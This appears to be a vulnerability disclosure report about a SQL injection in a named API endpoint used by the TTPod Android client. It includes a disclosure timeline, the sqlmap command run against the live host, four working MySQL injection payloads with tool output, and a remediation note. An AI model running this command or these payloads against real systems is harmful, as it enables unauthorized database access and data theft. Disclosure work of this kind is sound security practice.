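2014-06-24: Details reported to the vendor; awaiting vendor response
2014-06-25: Vendor confirmed; details disclosed to the vendor only
2014-07-05: Details disclosed to core white hats and experts in related fields
2014-07-15: Details disclosed to regular white hats
2014-07-25: Details disclosed to intern white hats
2014-08-08: Details disclosed to the public
Root privileges... damn. I didn't dump the database, do you believe me? -.-
Source: found in the latest version of the 天天动听 (TTPod) Android client
Injection point: http://api.busdh.com/market-api/appgame/global?f=f384&v=v6.5.0.2013123016
The GET parameter f is injectable. This is a notification that the injection point exists; no further testing was done!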
sqlmap.py -u 'http://api.busdh.com/market-api/appgame/global?f=f384&v=v6.5.0.2013123016' -p "f" --batch

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: f
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: f=f384' RLIKE (SELECT (CASE WHEN (5571=5571) THEN 0x66333834 ELSE 0x28 END)) AND 'snjQ'='snjQ&v=v6.5.0.2013123016

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)
    Payload: f=f384' AND UPDATEXML(3360,CONCAT(0x2e,0x716e6b6171,(SELECT (CASE WHEN (3360=3360) THEN 1 ELSE 0 END)),0x716e616d71),6423) AND 'tnpf'='tnpf&v=v6.5.0.2013123016

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: f=f384' UNION ALL SELECT CONCAT(0x716e6b6171,0x4e506c54656853686e61,0x716e616d71)#&v=v6.5.0.2013123016

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 OR time-based blind
    Payload: f=-8917' OR 5490=SLEEP(5) AND 'FWhc'='FWhc&v=v6.5.0.2013123016
---
back-end DBMS: MySQL 5.1
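Filter input effectively. I recommend changing the private information and related passwords posted above!
Severity: High
Vulnerability Rank: 10
Confirmed at: 2014-06-25 10:01
Thank you
None yet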